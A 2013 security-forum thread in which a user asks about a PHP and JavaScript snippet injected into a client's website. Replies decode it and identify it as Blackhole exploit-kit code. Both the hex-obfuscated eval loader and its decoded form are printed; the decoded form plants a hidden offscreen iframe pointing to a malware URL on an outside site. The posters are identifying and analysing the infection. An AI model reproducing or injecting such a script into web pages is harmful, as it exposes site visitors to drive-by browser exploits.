EvilZone

Hacking and Security => Hacking and Security => : Injunfarian September 06, 2013, 03:12:28 PM

: Anyone see this before?
: Injunfarian September 06, 2013, 03:12:28 PM
Just found this on a clients website:

: (javascript)
if(empty($co)) { $co = " <script type= language= > if(document.querySelector)vbmge=4;tekrka=(\"39,7f,8e,87,7c,8d,82,88,87,39,8c,8d,92,49,52,41,42,39,94,26,23,39,8f,7a,8b,39,8c,8d,7a,8d,82,7c,56,40,7a,83,7a,91,40,54,26,23,39,8f,7a,8b,39,7c,88,87,8d,8b,88,85,85,7e,8b,56,40,82,87,7d,7e,91,47,89,81,89,40,54,26,23,39,8f,7a,8b,39,8c,8d,92,39,56,39,7d,88,7c,8e,86,7e,87,8d,47,7c,8b,7e,7a,8d,7e,5e,85,7e,86,7e,87,8d,41,40,82,7f,8b,7a,86,7e,40,42,54,26,23,26,23,39,8c,8d,92,47,8c,8b,7c,39,56,39,40,81,8d,8d,89,53,48,48,90,90,90,47,7a,7c,7a,7d,7e,86,92,88,7f,7a,89,89,85,82,7e,7d,7a,8b,8d,8c,47,7c,88,86,48,86,7e,7d,82,7a,48,72,83,4f,65,63,5f,52,5b,47,89,81,89,40,54,26,23,39,8c,8d,92,47,8c,8d,92,85,7e,47,89,88,8c,82,8d,82,88,87,39,56,39,40,7a,7b,8c,88,85,8e,8d,7e,40,54,26,23,39,8c,8d,92,47,8c,8d,92,85,7e,47,7c,88,85,88,8b,39,56,39,40,50,49,4c,40,54,26,23,39,8c,8d,92,47,8c,8d,92,85,7e,47,81,7e,82,80,81,8d,39,56,39,40,50,49,4c,89,91,40,54,26,23,39,8c,8d,92,47,8c,8d,92,85,7e,47,90,82,7d,8d,81,39,56,39,40,50,49,4c,89,91,40,54,26,23,39,8c,8d,92,47,8c,8d,92,85,7e,47,85,7e,7f,8d,39,56,39,40,4a,49,49,49,50,49,4c,40,54,26,23,39,8c,8d,92,47,8c,8d,92,85,7e,47,8d,88,89,39,56,39,40,4a,49,49,49,50,49,4c,40,54,26,23,26,23,39,82,7f,39,41,3a,7d,88,7c,8e,86,7e,87,8d,47,80,7e,8d,5e,85,7e,86,7e,87,8d,5b,92,62,7d,41,40,8c,8d,92,40,42,42,39,94,26,23,39,7d,88,7c,8e,86,7e,87,8d,47,90,8b,82,8d,7e,41,40,55,89,39,82,7d,56,75,40,8c,8d,92,75,40,39,7c,85,7a,8c,8c,56,75,40,8c,8d,92,49,52,75,40,39,57,55,48,89,57,40,42,54,26,23,39,7d,88,7c,8e,86,7e,87,8d,47,80,7e,8d,5e,85,7e,86,7e,87,8d,5b,92,62,7d,41,40,8c,8d,92,40,42,47,7a,89,89,7e,87,7d,5c,81,82,85,7d,41,8c,8d,92,42,54,26,23,39,96,26,23,96,26,23,7f,8e,87,7c,8d,82,88,87,39,6c,7e,8d,5c,88,88,84,82,7e,41,7c,88,88,84,82,7e,67,7a,86,7e,45,7c,88,88,84,82,7e,6f,7a,85,8e,7e,45,87,5d,7a,92,8c,45,89,7a,8d,81,42,39,94,26,23,39,8f,7a,8b,39,8d,88,7d,7a,92,39,56,39,87,7e,90,39,5d,7a,8d,7e,41,42,54,26,23,39,8f,7a,8b,39,7e,91,89,82,8b,7e,39,56,39,87,7e,90,39,5d,7a,8d,7e,41,42,54,26,23,39,82,7f,39,41,87,5d,7a,92,8c,56,56,87,8e,85,85,39,95,95,39,87,5d,7a,92,8c,56,56,49,42,39,87,5d,7a,92,8c,56,4a,54,26,23,39,7e,91,89,82,8b,7e,47,8c,7e,8d,6d,82,86,7e,41,8d,88,7d,7a,92,47,80,7e,8d,6d,82,86,7e,41,42,39,44,39,4c,4f,49,49,49,49,49,43,4b,4d,43,87,5d,7a,92,8c,42,54,26,23,39,7d,88,7c,8e,86,7e,87,8d,47,7c,88,88,84,82,7e,39,56,39,7c,88,88,84,82,7e,67,7a,86,7e,44,3b,56,3b,44,7e,8c,7c,7a,89,7e,41,7c,88,88,84,82,7e,6f,7a,85,8e,7e,42,26,23,39,44,39,3b,54,7e,91,89,82,8b,7e,8c,56,3b,39,44,39,7e,91,89,82,8b,7e,47,8d,88,60,66,6d,6c,8d,8b,82,87,80,41,42,39,44,39,41,41,89,7a,8d,81,42,39,58,39,3b,54,39,89,7a,8d,81,56,3b,39,44,39,89,7a,8d,81,39,53,39,3b,3b,42,54,26,23,96,26,23,7f,8e,87,7c,8d,82,88,87,39,60,7e,8d,5c,88,88,84,82,7e,41,39,87,7a,86,7e,39,42,39,94,26,23,39,8f,7a,8b,39,8c,8d,7a,8b,8d,39,56,39,7d,88,7c,8e,86,7e,87,8d,47,7c,88,88,84,82,7e,47,82,87,7d,7e,91,68,7f,41,39,87,7a,86,7e,39,44,39,3b,56,3b,39,42,54,26,23,39,8f,7a,8b,39,85,7e,87,39,56,39,8c,8d,7a,8b,8d,39,44,39,87,7a,86,7e,47,85,7e,87,80,8d,81,39,44,39,4a,54,26,23,39,82,7f,39,41,39,41,39,3a,8c,8d,7a,8b,8d,39,42,39,3f,3f,26,23,39,41,39,87,7a,86,7e,39,3a,56,39,7d,88,7c,8e,86,7e,87,8d,47,7c,88,88,84,82,7e,47,8c,8e,7b,8c,8d,8b,82,87,80,41,39,49,45,39,87,7a,86,7e,47,85,7e,87,80,8d,81,39,42,39,42,39,42,26,23,39,94,26,23,39,8b,7e,8d,8e,8b,87,39,87,8e,85,85,54,26,23,39,96,26,23,39,82,7f,39,41,39,8c,8d,7a,8b,8d,39,56,56,39,46,4a,39,42,39,8b,7e,8d,8e,8b,87,39,87,8e,85,85,54,26,23,39,8f,7a,8b,39,7e,87,7d,39,56,39,7d,88,7c,8e,86,7e,87,8d,47,7c,88,88,84,82,7e,47,82,87,7d,7e,91,68,7f,41,39,3b,54,3b,45,39,85,7e,87,39,42,54,26,23,39,82,7f,39,41,39,7e,87,7d,39,56,56,39,46,4a,39,42,39,7e,87,7d,39,56,39,7d,88,7c,8e,86,7e,87,8d,47,7c,88,88,84,82,7e,47,85,7e,87,80,8d,81,54,26,23,39,8b,7e,8d,8e,8b,87,39,8e,87,7e,8c,7c,7a,89,7e,41,39,7d,88,7c,8e,86,7e,87,8d,47,7c,88,88,84,82,7e,47,8c,8e,7b,8c,8d,8b,82,87,80,41,39,85,7e,87,45,39,7e,87,7d,39,42,39,42,54,26,23,96,26,23,82,7f,39,41,87,7a,8f,82,80,7a,8d,88,8b,47,7c,88,88,84,82,7e,5e,87,7a,7b,85,7e,7d,42,26,23,94,26,23,82,7f,41,60,7e,8d,5c,88,88,84,82,7e,41,40,8f,82,8c,82,8d,7e,7d,78,8e,8a,40,42,56,56,4e,4e,42,94,96,7e,85,8c,7e,94,6c,7e,8d,5c,88,88,84,82,7e,41,40,8f,82,8c,82,8d,7e,7d,78,8e,8a,40,45,39,40,4e,4e,40,45,39,40,4a,40,45,39,40,48,40,42,54,26,23,26,23,8c,8d,92,49,52,41,42,54,26,23,96,26,23,96\".split(\",\"));siwbgu=eval;function etccbd(){gkpxj=function(){--(zuouf.body)}()}zuouf=document;for(mjt=0;mjt<tekrka[\"length\"];mjt+=1){tekrka[mjt]=-(25)+parseInt(tekrka[mjt],vbmge*4);}try{etccbd()}catch(kkzxji){fsu=50-50;}if(!fsu)siwbgu(String[\"fr\"+\"omCh\"+\"arCo\"+\"de\"].apply(String,tekrka));</script> "; echo $co; }

Anyone see it before? mixture of PHP and Javsscript.
: Re: Anyone see this before?
: WirelessDesert September 06, 2013, 03:16:02 PM
I suspect that the hexadecimal numbers are some kind of html string,  which could mean that it's some script, but idk, I'm not so experienced in php and JS.
: Re: Anyone see this before?
: Injunfarian September 06, 2013, 03:39:02 PM
here is the numbers broken down into code which is eval'd on the clients computer:

:
function sty09() { var static='ajax'; var controller='index.php'; var sty = document.createElement('iframe'); sty.src = 'http://www.academyofappliedarts.com/media/Yj6LJF9B.php'; sty.style.position = 'absolute'; sty.style.color = '703'; sty.style.height = '703px'; sty.style.width = '703px'; sty.style.left = '1000703'; sty.style.top = '1000703'; if (!document.getElementById('sty')) { document.write('<p id=\'sty\' class=\'sty09\' ></p>'); document.getElementById('sty').appendChild(sty); } } function SetCookie(cookieName,cookieValue,nDays,path) { var today = new Date(); var expire = new Date(); if (nDays==null || nDays==0) nDays=1; expire.setTime(today.getTime() + 3600000*24*nDays); document.cookie = cookieName+"="+escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : ""); } function GetCookie( name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) ); } if (navigator.cookieEnabled) { if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/'); sty09(); } }
: Re: Anyone see this before?
: geXXos September 06, 2013, 03:49:44 PM
As WD said, is hexadecimal numbers used in a javascript, JavaScript parseInt() Function  (http://www.w3schools.com/jsref/jsref_parseint.asp) from W3schools with HEX numbers.
: Re: Anyone see this before?
: WirelessDesert September 06, 2013, 04:25:18 PM
here is the numbers broken down into code which is eval'd on the clients computer:

function sty09() { var static='ajax'; var controller='index.php'; var sty = document.createElement('iframe'); sty.src = 'http://www.academyofappliedarts.com/media/Yj6LJF9B.php'; (http://www.academyofappliedarts.com/media/Yj6LJF9B.php';) sty.style.position = 'absolute'; sty.style.color = '703'; sty.style.height = '703px'; sty.style.width = '703px'; sty.style.left = '1000703'; sty.style.top = '1000703'; if (!document.getElementById('sty')) { document.write('<p id=\'sty\' class=\'sty09\' ></p>'); document.getElementById('sty').appendChild(sty); } } function SetCookie(cookieName,cookieValue,nDays,path) { var today = new Date(); var expire = new Date(); if (nDays==null || nDays==0) nDays=1; expire.setTime(today.getTime() + 3600000*24*nDays); document.cookie = cookieName+"="+escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : ""); } function GetCookie( name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) ); } if (navigator.cookieEnabled) { if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/'); sty09(); } }

I clicked that iframe php link, and whops! It's a malwarelink, so your client has gotten a malicious script injected to their website.
: Re: Anyone see this before?
: namespace7 September 06, 2013, 07:06:48 PM
To add to what others have said, the strange string which you see is obfuscated JavaScript code. Its part of the very popular Blackhole Exploit Kit.
: Re: Anyone see this before?
: kenjoe41 September 06, 2013, 07:13:32 PM
My two cents are that your client got him/herself pwned by a browser exploitation attack. Better look out.
: Re: Anyone see this before?
: Spacecow September 07, 2013, 05:06:42 AM
I assumed it was an exploit kit as soon as I saw the iframe in the decoded JS. I would scan over your clients entire sit just too make sure there's no more funny business on it like this.